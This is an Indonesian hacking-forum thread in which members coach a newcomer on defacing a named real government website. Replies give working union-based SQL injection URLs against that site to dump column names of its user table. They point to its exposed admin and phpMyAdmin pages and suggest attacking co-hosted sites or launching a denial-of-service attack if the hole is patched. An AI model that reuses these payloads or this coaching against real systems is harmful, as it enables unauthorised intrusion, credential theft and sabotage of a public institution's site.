ask : cara terusin deface
Moderators: Paman, Xshadow, indounderground, NeOS-01
Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
- shinichi81
- Posts: 137
- Joined: Tue Jan 19, 2010 6:25 pm
- Location: Bandung Van Java
ask : cara terusin deface
Bos,maap mo minta bantuan,saya coba inject web ini tapi keluar tulisannya : mysql_fetch_assoc()
nama web --> http://www.dotr.gov.ge/geo/news.php?id=99
poc ----> http://www.dotr.gov.ge/geo/news.php?id= ... e=0xhexa--
tetapi keluar tulisannya :
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/dotrgovg/domains/dotr.gov.ge/public_html/geo/include_news.php on line 21
apakah itu bisa saya teruskan lagi atau tidak bos,mohon bimbingannya.makasih suhu :kaca: :kaca: :kaca:
nama web --> http://www.dotr.gov.ge/geo/news.php?id=99
poc ----> http://www.dotr.gov.ge/geo/news.php?id= ... e=0xhexa--
tetapi keluar tulisannya :
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/dotrgovg/domains/dotr.gov.ge/public_html/geo/include_news.php on line 21
apakah itu bisa saya teruskan lagi atau tidak bos,mohon bimbingannya.makasih suhu :kaca: :kaca: :kaca:
............make a wish............
- Xshadow
- Posts: 482
- Joined: Thu May 31, 2007 8:01 pm
- Location: http://captureflags.com
- Contact:
Re: ask : cara terusin deface
Code: Select all
http://www.dotr.gov.ge/geo/news.php?id=-99+union+select+1,2,group_concat(column_name),4,5,user(),7,8+from+information_schema.columns+where+table_name=0xhexa--
baca tutornya sekali lagi yang saya tebelin dan berwarna merah itu apa... tolong dibaca dengan jeli tutorialnya
nech buat kamu
baca dengan baik ya...
Code: Select all
http://www.forkliftpartsmanual.com/anu.html
[X]perimental [S]ynthetic [H]umanoid [A]ssembled for [D]estruction and [O]nline [W]arfare
Re: ask : cara terusin deface
itu web kyanya udh di patch deh....kaga bisa login ke adminnya :shinichi81 wrote:Bos,maap mo minta bantuan,saya coba inject web ini tapi keluar tulisannya : mysql_fetch_assoc()
nama web --> http://www.dotr.gov.ge/geo/news.php?id=99
poc ----> http://www.dotr.gov.ge/geo/news.php?id= ... e=0xhexa--
tetapi keluar tulisannya :
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/dotrgovg/domains/dotr.gov.ge/public_html/geo/include_news.php on line 21
apakah itu bisa saya teruskan lagi atau tidak bos,mohon bimbingannya.makasih suhu :kaca: :kaca: :kaca:
http://www.dotr.gov.ge/admin/
:mati: :mati: :mati:
- 3xtr3m3b0y
- Posts: 317
- Joined: Wed Apr 22, 2009 5:11 pm
- Location: ~[Hacked Machine]~
- Contact:
Re: ask : cara terusin deface
Bukan dipatch, halaman Admin gak bisa konek ke Database Server.ecko wrote: itu web kyanya udh di patch deh....kaga bisa login ke adminnya :
http://www.dotr.gov.ge/admin/
:mati: :mati: :mati:
Ada halaman menarik neh http://www.dotr.gov.ge/phpmyadmin/
...n0 l1m17...
- shinichi81
- Posts: 137
- Joined: Tue Jan 19, 2010 6:25 pm
- Location: Bandung Van Java
Re: ask : cara terusin deface
kalau udah di patch,bagaimana cara inject-nya lagi yah?? sepertinya beda caranya yah?? bisa diberi tutor bos,kalau mo inject web yang udah di patch :kaca: :kaca:
............make a wish............
- 3xtr3m3b0y
- Posts: 317
- Joined: Wed Apr 22, 2009 5:11 pm
- Location: ~[Hacked Machine]~
- Contact:
Re: ask : cara terusin deface
Pada bagian table_name gak perlu pke bilangan HEXA, cukup pke STRING aja, karena directive magic_quotes_gpc = off, sehingga kita bisa menggunakan STRING.shinichi81 wrote:Bos,maap mo minta bantuan,saya coba inject web ini tapi keluar tulisannya : mysql_fetch_assoc()
nama web --> http://www.dotr.gov.ge/geo/news.php?id=99
poc ----> http://www.dotr.gov.ge/geo/news.php?id= ... e=0xhexa--
tetapi keluar tulisannya :
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/dotrgovg/domains/dotr.gov.ge/public_html/geo/include_news.php on line 21
apakah itu bisa saya teruskan lagi atau tidak bos,mohon bimbingannya.makasih suhu :kaca: :kaca: :kaca:
Untuk mengeceknya :
Code: Select all
http://www.dotr.gov.ge/eng/news.php?id=-99+union+select+1,2,3,4,5,'test pke string',7,8--
Jadi alamat URL sebelumnya akan seperti ini :
Code: Select all
http://www.dotr.gov.ge/eng/news.php?id=-99+union+select+1,2,3,4,5,group_concat(column_name),7,8+from+information_schema.columns+where+table_name='user'--
...n0 l1m17...
- 3xtr3m3b0y
- Posts: 317
- Joined: Wed Apr 22, 2009 5:11 pm
- Location: ~[Hacked Machine]~
- Contact:
Re: ask : cara terusin deface
Jika halaman/file yg vuln sdh dipatch, kita bisa mencoba mencari halaman lain yg mungkin belum dipatch, atau dengan mencari jenis vuln lain yg mgkn ada pada web tsb. Klo ternyata sdh dipatch semuax, kita coba dgn teknik JUMPING ATTACK, kita ambil alih web lain yg satu server dgn web tsb, lalu coba masuk ke lokasi web target sebelumnya. Jika ternyata gak bisa juga 'n kita ttp kekeh buat matiin tuh web, bisa coba pke teknik DoS.shinichi81 wrote:kalau udah di patch,bagaimana cara inject-nya lagi yah?? sepertinya beda caranya yah?? bisa diberi tutor bos,kalau mo inject web yang udah di patch :kaca: :kaca:
Mgkn teman yg lain bisa nambahin teknik ilmiah apalagi yg bisa kita gunakan...
...n0 l1m17...
- shinichi81
- Posts: 137
- Joined: Tue Jan 19, 2010 6:25 pm
- Location: Bandung Van Java
Re: ask : cara terusin deface
makasih suhu2,jadi bertambah nih ilmunya :love: :love: :love: eh bos,kalau teknik JUMPING teh apaan yah :malumalu: :malumalu: :malumalu:
............make a wish............
- Xshadow
- Posts: 482
- Joined: Thu May 31, 2007 8:01 pm
- Location: http://captureflags.com
- Contact:
Re: ask : cara terusin deface
pelajari 1-1... kalo dah kelar baru bahas yang lain...
[X]perimental [S]ynthetic [H]umanoid [A]ssembled for [D]estruction and [O]nline [W]arfare
- shinichi81
- Posts: 137
- Joined: Tue Jan 19, 2010 6:25 pm
- Location: Bandung Van Java
Re: ask : cara terusin deface
Xshadow wrote:pelajari 1-1... kalo dah kelar baru bahas yang lain...
Siap Bos Xshadow,nanti saya coba oprek lagi hehehe....Bos,kalau 1-1 teh apaan? atau maksudnya dari tahap pertama dilang lagi yah cari yang belum di patch :pusing: :pusing: :pusing:
............make a wish............